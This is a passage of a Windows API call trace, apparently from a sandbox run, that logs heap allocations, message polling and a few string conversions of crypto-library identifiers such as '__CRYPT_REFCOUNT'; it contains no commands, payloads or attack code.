[0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0184.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.505] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0184.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0184.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0184.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0184.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.505] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0184.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.506] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0184.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0184.506] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.507] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0184.507] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0184.508] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0184.508] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0184.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0184.508] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0184.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0184.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0184.508] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0184.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0184.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0184.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.508] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0184.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0184.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.508] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0184.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0184.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0184.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0184.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0184.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0184.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0184.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0184.510] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0184.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0184.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0184.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0184.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0184.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0184.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0184.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0184.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0184.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0184.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0184.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0184.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0184.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0184.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d5) returned 0x3bf0728 [0184.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0728 | out: hHeap=0x970000) returned 1 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0184.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0184.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 